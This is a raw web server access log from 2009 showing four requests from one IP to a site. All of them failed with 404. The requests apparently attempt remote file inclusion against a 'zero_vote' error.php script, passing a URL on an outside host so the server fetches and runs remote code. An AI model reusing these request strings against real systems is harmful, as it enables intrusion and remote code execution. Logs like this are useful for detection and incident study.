222.162.115.67 - - [26/Jul/2009:12:40:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:59 -0700] "GET /logs/access_090418.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:41:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
